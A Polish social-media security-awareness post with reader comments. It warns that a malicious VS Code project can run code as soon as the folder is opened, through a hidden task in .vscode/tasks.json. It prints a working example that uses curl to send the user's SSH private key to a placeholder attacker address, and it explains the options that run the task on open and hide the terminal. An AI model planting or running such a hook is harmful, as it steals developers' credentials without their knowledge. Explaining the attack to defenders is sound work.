Aktywne Wpisy
jmuhha +38
Też zgadzacie się ze mną, że żenić warto się z jedynakiem bo on przejmuje majątek swoich rodziców a faceci mający rodzeństwo są z automatu biedniejsi i walczą o zasoby z rodzeństwem, które mogliby przeznaczyć np na żonę?
#pytanie #zwiazki #rozowepaski #tinder
#pytanie #zwiazki #rozowepaski #tinder
waszym zdaniem
- lepszy jedynak 64.5% (595)
- lepiej być sama niż bez jedynaka 35.5% (327)
Vamyss +245
W pracy kurła a gdzie.
Czekamy o 6 rano na klatce schodowej na strażaków aby użyli swojego kluczyka i otwarli nam mieszkanie ( ͡° ͜ʖ ͡°)
#pracbaza
Czekamy o 6 rano na klatce schodowej na strażaków aby użyli swojego kluczyka i otwarli nam mieszkanie ( ͡° ͜ʖ ͡°)
#pracbaza
TL;DR: jeśli pobierzesz i otworzysz złośliwy projekt, a następnie wciśniesz niebieski przycisk
Yes, I Trust- potencjalny atakujący może wykonać dowolny skrypt/program na Twoim komputerze.Projekt w Visual Studio Code może posiadać specjalny plik
.vscode/tasks.json. Dla przykładu:{"version": "2.0.0",
"tasks": [
{
"label": "Uruchom testy",
"type": "shell",
"group": "test",
"command": "curl -d @/Users/kacper/.ssh/id_rsa https://tutaj_twój_adres",
"runOptions": {
"runOn": "folderOpen"
},
"presentation": {
"reveal": "never",
"panel": "new",
}
}
]
}
Ukradnie klucz prywatny użytkownika Kacper i wyśle go do serwera atakującego.
"runOn": "folderOpen"- Nasze zadanie zostanie uruchomione automatycznie, zaraz po otworzeniu projektu."reveal": "never"- Ta opcja sprawia, że użytkownikowi nie wyświetli się okno terminala.Czy takie ataki są popularne? NIE.
Czy się zdarzają? TAK.
Więcej zobaczysz na YouTube lub na blogu.
Interesujesz się bezpieczeństwem? Sprawdź mój kurs Bezpieczny Programista.
#programowanie #programista15k #gruparatowaniapoziomu #technologia #ciekawostki #bezpieczenstwo #informatyka #komputery #nauka
Imho warto tu dodać, że ataki celowane w programistów stają się coraz bardziej popularne więc ten zapis może się zmienić ( ͡º ͜ʖ͡º)
@KacperSzurek:
To nie jest żaden specjalny plik, tylko definicje zadań do automatyzacji.
Po drugie:
Gówno może. To użytkownik musi odpalić task o nazwie "Uruchom testy"
Po trzecie:
@KacperSzurek: Dzięki za kontent. Chociaż nie używasz vsc ( ͡° ͜ʖ ͡°), to podnosisz ogólny poziom świadomości młodzieży. (
@kot_gagarina: Popraweczka do punktu 2. Kod może faktycznie odpalić się w vsc "automatycznie". W tasks.json można zauważyć, wpisy runOn: folderOpen oraz "reveal": "never". Pierwsze odpala skrypt po otworzeniu folderu, drugie odpala skrypt, bez tworzenia okna terminala.
Kiedyś to było, a teraz to nie ma ( ͡° ͜ʖ ͡°)
No i nie porównuj notatnika czy Windowsa do Emacsa, powiedz mi czy Windows ma psychoterapię? A Emacs ma pod komendą doctor ( ͡° ͜ʖ ͡°)
@mvmxks: Windows ma całą procedurę: "Rozwiąż Problem"!!!
A co do emacsa, to starsi pamiętają, jakie potrafi stanowić zagrożenie (zwłaszcza w połączeniu z sendmailem)!!!
Zoba!